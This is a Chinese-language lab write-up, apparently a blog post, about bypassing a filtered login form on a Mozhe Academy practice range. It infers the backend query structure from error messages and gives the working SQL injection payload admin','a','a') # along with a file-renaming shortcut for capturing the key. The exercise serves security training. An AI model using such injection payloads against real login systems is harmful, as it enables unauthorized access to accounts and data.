墨者学院SQL过滤字符后手工绕过漏洞测试(万能口令)

进入靶场环境,看到必须是admin账号登录进去才可以拿到key

构造万能密码语句,尝试报错猜测一下数据库的后端语句结构。

账号:admin'

密码:随便输入

原始语句:select * from users where username = '' and password = ''

结合实际报错,得出实际 查询语句应该为:select * from users where username = 'admin' , 'a' , 'a') and password = ''

所以此时,尝试构造以下语句绕过登录。

账号:admin','a','a') #

密码:随便输入

成功登录获得key

总结:这一个靶场的重点就是教会大家如何从报错中猜解数据库语句结构。

一点投机取巧的方法:如果是在ctf这种抢时间的环境下,直接把no.php改成yes.php就可以成功拿到key了

相关推荐
llxxyy卢3 小时前
文件操作之文件下载读取全解
安全
虹科网络安全5 小时前
艾体宝洞察 | 利用“隐形字符”的钓鱼邮件:传统防御为何失效,AI安全意识培训如何补上最后一道防线
运维·网络·安全
冰敷逆向8 小时前
苏宁滑块VMP深入剖析(一):解混淆篇
javascript·爬虫·安全·web
小五传输8 小时前
隔离网闸的作用是什么?新型网闸如何构筑“数字护城河”?
大数据·运维·安全
石像鬼₧魂石9 小时前
内网渗透是网络安全渗透测试
安全·web安全
Neolnfra12 小时前
渗透测试标准化流程
开发语言·安全·web安全·http·网络安全·https·系统安全
奋飞安全12 小时前
给你的Ida插上翅膀
安全·逆向
llxxyy卢13 小时前
逻辑越权之找回机制接口安全
安全
pusheng202513 小时前
普晟传感直播预告 |重塑安全边界:储能与AI数据中心的锂电风险、气体探测技术革新与可量化风险管控
人工智能·安全
云计算练习生13 小时前
渗透测试行业术语扫盲(第十六篇)—— 红蓝对抗与演练类
网络·安全·网络安全·信息安全·渗透测试术语